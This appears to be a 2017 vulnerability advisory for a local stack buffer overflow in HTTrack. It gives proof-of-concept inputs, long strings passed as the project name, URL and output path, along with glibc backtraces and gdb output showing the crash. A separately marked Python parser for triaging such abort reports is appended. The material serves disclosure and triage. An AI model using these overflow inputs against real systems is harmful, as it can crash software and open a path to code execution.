HTTrack Local Stack Buffer Overflow

2017-05-07 / 2017-05-08
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

################
#Exploit Title: HTTrack Local Stack Buffer Overflow
#CWE: CWE-119
#Exploit Author: Hosein Askari
#Vendor HomePage: http://www.httrack.com
#Version : 3.48-22-1(Fedora 25), 3.48-24(Debian)
#Exploit Tested on: Parrot OS
#Date: 07-05-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Buffer overflow in URI and Project Name processing in HTTrack and WebHTTrack on version 3.48-22-1 (Fedora 25) and 3.48-24(Debian) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long String.
###############################

---> Wizard command line: httrack AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v

Ready to launch the mirror? (Y/n) :y

WARNING! You are running this program as root!
It might be a good idea to run as a different user

*** buffer overflow detected ***: httrack terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
httrack(+0x152e)[0x8000152e]
======= Memory map: ========
Caught signal 6
httrack(+0x1de3)[0x80001de3]
[0xb7fd9d04]
[0xb7fd9cf9]
/lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050]
/lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577]
/lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] httrack(+0x152e)[0x8000152e] Please report the problem at http://forum.httrack.com Aborted (core dumped) -------------------- (gdb) run Starting program: /usr/bin/httrack [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". Welcome to HTTrack Website Copier (Offline Browser) 3.48-24 Copyright (C) 1998-2016 Xavier Roche and other contributors To see the option list, enter a blank line or try httrack --help Enter project name :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Base path (return=/home/constantine/websites/) : Enter URLs (separated by commas or blank spaces) :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Action: (enter) 1 Mirror Web Site(s) 2 Mirror Web Site(s) with Wizard 3 Just 
Get Files Indicated 4 Mirror ALL links in URLs (Multiple Mirror) 5 Test Links In URLs (Bookmark Test) 0 Quit : : 1 Proxy (return=none) : You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip Wildcards (return=none) : You can define additional options, such as recurse level (-r<number>), separated by blank spaces To see the option list, type help Additional options (return=none) : ---> Wizard command line: httrack AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v Ready to launch the mirror? (Y/n) :y WARNING! You are running this program as root! 
It might be a good idea to run as a different user

*** buffer overflow detected ***: /usr/bin/httrack terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/bin/httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
/usr/bin/httrack(+0x152e)[0x8000152e]
======= Memory map: ========
Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()
(gdb) continue
Continuing.
Caught signal 6
/usr/bin/httrack(+0x1de3)[0x80001de3]
[0xb7fd9d04]
[0xb7fd9cf9]
/lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050]
/lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577]
/lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/bin/httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
/usr/bin/httrack(+0x152e)[0x8000152e]
Please report the problem at http://forum.httrack.com

Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()
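
Added example, not part of the original advisory: a small triage parser for the glibc abort report shown above. It finds the first frame outside libc after `__fortify_fail`, which is the return address in the code that called the bounds-checked libc routine. The function names and the returned dictionary layout are assumptions of this example.

```python
import os
import re

# First backtrace from the advisory above (frames copied as-is, memory map left out).
SAMPLE = """\
*** buffer overflow detected ***: httrack terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
httrack(+0x152e)[0x8000152e]
"""

BANNER = re.compile(r"\*\*\* (.+?) \*\*\*: (\S+) terminated")
LIBC = re.compile(r"libc[.-]")  # libc.so.6 / libc-2.24.so, but not libcrypto
# module(symbol+0xoff)[0xaddr]; symbol is empty when glibc could not name the frame.
FRAME = re.compile(r"(\S+?)\(([^()+]*)(?:\+(0x[0-9a-f]+))?\)\[(0x[0-9a-f]+)\]")

def parse_frames(report):
    """Return (module basename, symbol, offset, address) per frame; flattened text works too."""
    return [(os.path.basename(m), sym, off, addr)
            for m, sym, off, addr in FRAME.findall(report)]

def triage(report):
    """Summarise a glibc fortify abort: which check fired and where libc was called from."""
    banner = BANNER.search(report)
    frames = parse_frames(report)
    names = [sym for _, sym, _, _ in frames]
    if not banner or "__fortify_fail" not in names:
        return None
    after = frames[names.index("__fortify_fail") + 1:]
    # First frame outside libc: return address in the code that called the checked routine.
    callers = [f for f in after if not LIBC.match(f[0])]
    if not callers:
        return None
    mod, sym, off, _ = callers[0]
    site = f"{mod}:{sym}+{off}" if sym else f"{mod}+{off}"
    named = list(dict.fromkeys(s for _, s, _, _ in callers if s))
    return {"check": banner.group(1), "program": banner.group(2),
            "call_site": site, "named_callers": named}
```

A frame without a symbol carries a module-relative offset, so the reported call site can be resolved against the matching debug symbols for `libhttrack.so.2` to locate the unchecked copy.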


Copyright 2017, cxsecurity.com

 
